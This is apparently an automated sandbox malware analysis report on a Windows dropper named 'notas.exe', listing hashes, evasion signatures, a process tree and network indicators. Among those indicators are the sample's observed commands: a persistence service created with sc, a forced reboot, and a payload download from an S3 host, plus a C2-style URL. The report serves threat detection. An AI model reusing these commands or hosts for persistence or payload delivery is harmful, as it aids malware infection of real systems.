Edit tour

Windows Analysis Report
0219830219301290321012notas.exe

Overview

General Information

Sample name:	0219830219301290321012notas.exe
Analysis ID:	1397701
MD5:	a548469585481a1b7f98c9b09d271349
SHA1:	677eabeb661d965c7d3d5ff6f6b9336e27b80b91
SHA256:	21340c04b12af92f3bd3dd076e5a4f20c0fe5558461b5ff3f848e5d5b7183322
Tags:	exe
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)

Found evasive API chain checking for user administrative privileges

Found stalling execution ending in API Sleep call

Machine Learning detection for dropped file

Uses shutdown.exe to shutdown or reboot the system

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

0219830219301290321012notas.exe (PID: 4068 cmdline: C:\Users\user\Desktop\0219830219301290321012notas.exe MD5: A548469585481A1B7F98C9B09D271349)

0219830219301290321012notas.exe (PID: 7172 cmdline: "C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC MD5: A548469585481A1B7F98C9B09D271349)

Update.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)

BumpFiles.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun MD5: CC09BB7FDEFC5763CCB3CF7DAE2D76CF)

BumpFiles.exe (PID: 7380 cmdline: "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" MD5: CC09BB7FDEFC5763CCB3CF7DAE2D76CF)

cmd.exe (PID: 7504 cmdline: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7564 cmdline: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

shutdown.exe (PID: 7544 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\ContentPack\Update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.Update.exe.330000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

System Summary

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ProcessId: 7564, ProcessName: sc.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 0219830219301290321012notas.exe

Virustotal: Detection: 16%

Perma Link

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dll

Joe Sandbox ML: detected

Source: 0219830219301290321012notas.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentPack

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

Jump to behavior

Source: unknown

HTTPS traffic detected: 3.5.234.1:443 -> 192.168.2.8:49705 version: TLS 1.2

Source: 0219830219301290321012notas.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.1403703222.000000000293C000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.7.dr
Source:	Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.7.dr
Source:	Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.7.dr
Source:	Binary string: netstandard.pdb.mdb source: Update.exe
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000003.00000002.1403703222.0000000002915000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe0.3.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.7.dr
Source:	Binary string: endpointdlp.pdb source: endpointdlp.dll.7.dr
Source:	Binary string: DefenderCSP.pdb source: DefenderCSP.dll.7.dr
Source:	Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.7.dr
Source:	Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.7.dr
Source:	Binary string: shellext.pdb source: shellext.dll.7.dr
Source:	Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.7.dr
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0219830219301290321012notas.exe
Source:	Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.7.dr
Source:	Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.7.dr
Source:	Binary string: MpCommu.pdb source: MpCommu.dll.7.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.7.dr
Source:	Binary string: MpCommu.pdbGCTL source: MpCommu.dll.7.dr
Source:	Binary string: shellext.pdbOGPS source: shellext.dll.7.dr
Source:	Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.7.dr
Source:	Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.7.dr
Source:	Binary string: MsMpEng.pdb source: Update.exe, 00000003.00000002.1403703222.00000000028CA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.000000000297E000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe, 00000004.00000000.1375829576.00000000006C1000.00000020.00000001.01000000.00000008.sdmp, BumpFiles.exe, 00000007.00000000.1386117010.00000000006C1000.00000020.00000001.01000000.00000008.sdmp, MsMpEng.exe.7.dr
Source:	Binary string: MsMpEng.pdbGCTL source: MsMpEng.exe.7.dr
Source:	Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.7.dr
Source:	Binary string: DefenderCSP.pdbGCTL source: DefenderCSP.dll.7.dr

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D55564 FindFirstFileExW,	0_2_00D55564
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040D3E4 FindFirstFileW,FindClose,	4_2_0040D3E4
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	4_2_0040CE18
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0040D3E4 FindFirstFileW,FindClose,	7_2_0040D3E4
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	7_2_0040CE18

Networking

Yara detected Generic Downloader

Source: Yara match	File source: Update.exe, type: SAMPLE
Source: Yara match	File source: 3.0.Update.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\ContentPack\Update.exe, type: DROPPED

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /webTc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Code function: 4_2_00633A38 Sleep,URLDownloadToFileW,Sleep,

4_2_00633A38

Source: global traffic

Source: unknown

DNS traffic detected: queries for: awsserver903203232.s3.sa-east-1.amazonaws.com

Source: MpCmdRun.dll.7.dr	String found in binary or memory: http://20.201.117.220/sab3/HMlmsowpmT.php?a=
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/ContentPack.nuspec
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/_rels/.rels
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/lib/net48/BumpFiles.exe
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/lib/net48/MpSvc.dll
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/lib/net48/vcruntime140.dll
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
Source: Update.exe, 00000003.00000002.1403703222.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
Source: MpCommu.dll.7.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
Source: MpCommu.dll.7.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: Update.exe, 00000003.00000002.1403703222.00000000029AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.openxmlformats.or
Source: MpCommu.dll.7.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: ThirdPartyNotices.txt.7.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: BumpFiles.exe, MpCmdRun.dll.7.dr	String found in binary or memory: http://www.delphiforfun.org/
Source: BumpFiles.exe, 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BumpFiles.exe, 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, MpSvc.dll.3.dr	String found in binary or memory: http://www.delphiforfun.org/openU
Source: Update.exe	String found in binary or memory: https://api.github.com/#
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448611101.0000000002F15000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/h
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448746188.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448555352.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2617404408.000000000491D000.00000004.00001000.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip#
Source: BumpFiles.exe, 00000007.00000002.2609950296.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip.
Source: BumpFiles.exe, 00000007.00000002.2609950296.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip;
Source: BumpFiles.exe, 00000007.00000003.1448555352.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipSSC:
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipg
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipm
Source: BumpFiles.exe, 00000007.00000003.1448804522.0000000002F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipu1poC:
Source: ThirdPartyNotices.txt.7.dr	String found in binary or memory: https://github.com/Microsoft/cpprestsdk.
Source: ThirdPartyNotices.txt.7.dr	String found in binary or memory: https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)
Source: Update.exe	String found in binary or memory: https://github.com/myuser/myrepo
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448804522.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 3.5.234.1:443 -> 192.168.2.8:49705 version: TLS 1.2

System Summary

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Process created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D438F8	0_2_00D438F8
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D442C9	0_2_00D442C9
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D5BAA4	0_2_00D5BAA4
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D5BBC8	0_2_00D5BBC8
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D584D7	0_2_00D584D7
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D4465F	0_2_00D4465F
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D42FF0	0_2_00D42FF0
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D45758	0_2_00D45758
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D57F40	0_2_00D57F40
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FFB4B1A0F18	3_2_00007FFB4B1A0F18
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FFB4B1AE62B	3_2_00007FFB4B1AE62B
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FFB4B1A0F25	3_2_00007FFB4B1A0F25
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FFB4B1C43E0	3_2_00007FFB4B1C43E0
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FFB4B1C337D	3_2_00007FFB4B1C337D
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040B944	4_2_0040B944
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0052594C	4_2_0052594C
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_00525C0C	4_2_00525C0C
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0040B944	7_2_0040B944
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0052594C	7_2_0052594C
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_00525C0C	7_2_00525C0C

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe 545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll 7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: String function: 0040C1E4 appears 32 times
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: String function: 0041028C appears 32 times
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: String function: 00D4B010 appears 33 times

Source: 0219830219301290321012notas.exe	Static PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: NisSrv.exe.7.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: ProtectionManagement.dll.mui0.7.dr	Static PE information: No import functions for PE file found
Source: OfflineScannerShell.exe.mui0.7.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.7.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll.7.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.7.dr	Static PE information: No import functions for PE file found
Source: shellext.dll.mui0.7.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.7.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll.mui.7.dr	Static PE information: No import functions for PE file found
Source: MsMpRes.dll.mui0.7.dr	Static PE information: No import functions for PE file found
Source: shellext.dll.mui.7.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.7.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.7.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll.mui0.7.dr	Static PE information: No import functions for PE file found
Source: OfflineScannerShell.exe.mui.7.dr	Static PE information: No import functions for PE file found
Source: MsMpRes.dll.7.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.7.dr	Static PE information: No import functions for PE file found
Source: MsMpRes.dll.mui.7.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.7.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.7.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll0.7.dr	Static PE information: No import functions for PE file found
Source: EppManifest.dll.7.dr	Static PE information: No import functions for PE file found

Source: 0219830219301290321012notas.exe, 00000002.00000003.1353378870.0000000000B21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUpdate.exe2 vs 0219830219301290321012notas.exe
Source: 0219830219301290321012notas.exe, 00000002.00000003.1353378870.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUpdate.exe2 vs 0219830219301290321012notas.exe
Source: 0219830219301290321012notas.exe	Binary or memory string: OriginalFilenameSetup.exe6 vs 0219830219301290321012notas.exe

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Section loaded: mscoree.dll	Jump to behavior
